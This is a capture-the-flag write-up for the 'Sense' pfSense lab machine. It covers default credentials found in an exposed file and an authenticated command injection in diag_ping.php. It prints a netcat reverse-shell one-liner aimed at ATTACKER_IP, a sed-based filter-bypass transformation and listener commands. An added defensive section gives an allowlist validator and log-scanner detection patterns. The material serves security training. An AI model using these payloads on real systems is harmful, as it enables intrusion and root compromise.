Sense is a pfSense firewall appliance vulnerable to an authentication bypass and remote command execution. Enumerating publicly accessible configuration files recovers default credentials. Once authenticated, a known pfSense 2.1.3 vulnerability provides a root shell.
Target: sense.htb
Initial vector: exposed configuration file → default pfSense credentials
Privilege escalation: pfSense 2.1.3 RCE → root
Nmap:
22/tcp ssh
80/tcp http (pfSense login page)
The web interface is pfSense. Directory fuzzing reveals a sensitive file:
/system-users.txt
This file contains default pfSense credentials:
admin : pfsense
Login at:
http://sense.htb/
Once inside the dashboard, the version is visible:
pfSense 2.1.3
This version is vulnerable to an authenticated RCE (found via searchsploit).
Use the public exploit (e.g. exploit-db 43560 or similar).
The exploit abuses the diag_ping.php page to inject commands.
Example usage:
$ python3 exploit.py -u admin -p pfsense -t http://sense.htb
A root shell is obtained immediately because pfSense runs the web interface as root.
pfSense filters special characters, but the filter can be bypassed by replacing them with variables and using sed to reconstruct the payload.
Example transformation:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 443 >/tmp/f" \
| sed 's/\//${HOME}/g' \
| sed 's/-/${guion}/g' \
| sed 's/&/${ampersand}/g'
This produces a payload that bypasses pfSense’s input filters and still executes a reverse shell.
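The two weaknesses above (a page that passes a user-supplied ping target to a shell, and a character blacklist that `${VAR}` expansion walks around) are easiest to see from the defender's side. The following is an added example, not code from the original write-up or from pfSense: an allowlist validator for a ping target, which rejects anything that is not an IP literal or a plain hostname and so leaves nothing for variable expansion to reconstruct, plus a scanner that runs over constructed web-server access-log lines and flags requests for the exposed credentials file and `diag_ping.php` requests carrying shell metacharacters or `${...}` tokens. The log format, the assumption that request parameters appear in the logged URL, and the sample lines are all assumptions made for this example.

```python
"""Added example (not from the original write-up or from pfSense).

validate_ping_target(): allowlist check for a ping target. The pfSense 2.1.3
blacklist of special characters is what the ${VAR} trick gets around; accepting
only a parseable IP address or an RFC 1123 hostname closes that route.

scan_access_log(): runs over constructed access-log lines and flags requests
for the exposed credentials file and diag_ping.php requests whose parameters
contain shell metacharacters or ${...} expansion tokens.

Assumptions: combined-style log lines with the query string in the request
target (real diag_ping.php submits a POST form, so a production rule would
read the parameters from the web application's own log instead).
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)

# Characters that let a value break out of the intended ping command, plus the
# ${...} form used to rebuild filtered characters from environment variables.
SHELL_META_RE = re.compile(r"[;|&`$<>\n]|\$\{[^}]*\}")

# Combined log format (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

EXPOSED_FILES = {"/system-users.txt"}      # path named in the write-up
INJECTION_PAGES = {"/diag_ping.php"}       # page named in the write-up


def validate_ping_target(value: str) -> bool:
    """Allowlist: True only for an IPv4/IPv6 literal or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def classify_request(target: str):
    """Return a finding label for one request target, or None if benign."""
    parts = urlsplit(target)
    if parts.path in EXPOSED_FILES:
        return "exposed-config-file"
    if parts.path in INJECTION_PAGES:
        # parse_qs percent-decodes values, so %3B and %24%7B...%7D are visible.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if SHELL_META_RE.search(value):
                    return "command-injection-attempt"
                if name == "host" and not validate_ping_target(value):
                    return "command-injection-attempt"
    return None


def scan_access_log(text: str):
    """Return (source, timestamp, label, target) for every flagged line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            findings.append((m.group("src"), m.group("ts"), label, m.group("target")))
    return findings


# Constructed sample log: credential-file fetch, login, benign ping, and a ping
# whose host parameter carries ';' and ${HOME} tokens (the bypass described above).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /system-users.txt HTTP/1.1" 200 106
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "POST /index.php HTTP/1.1" 302 0
10.10.14.5 - - [01/Jan/2024:10:00:20 +0000] "GET /diag_ping.php?host=8.8.8.8&count=3 HTTP/1.1" 200 1540
10.10.14.5 - - [01/Jan/2024:10:00:41 +0000] "GET /diag_ping.php?host=8.8.8.8%3B%24%7BHOME%7Dbin%24%7BHOME%7Did&count=3 HTTP/1.1" 200 1540
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(*finding)
```

The validator is the mitigation and the scanner is the detection: a blacklist has to anticipate every encoding and expansion trick, whereas the allowlist only has to describe what a ping target legitimately looks like. The scanner's `host` check reuses the same validator, so a value that would be rejected at the application is also the value that gets flagged in the logs.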
Listener:
$ nc -nlvp 443
Trigger the payload through the ping diagnostic page and a root shell is returned.
pfSense’s web interface runs as root, so no privilege escalation is required. Once RCE is achieved, the shell is already root.
Sense is a straightforward pfSense exploitation machine: exposed configuration files reveal default credentials, and pfSense 2.1.3 provides a trivial authenticated RCE path. Because pfSense executes web commands as root, full system compromise is immediate.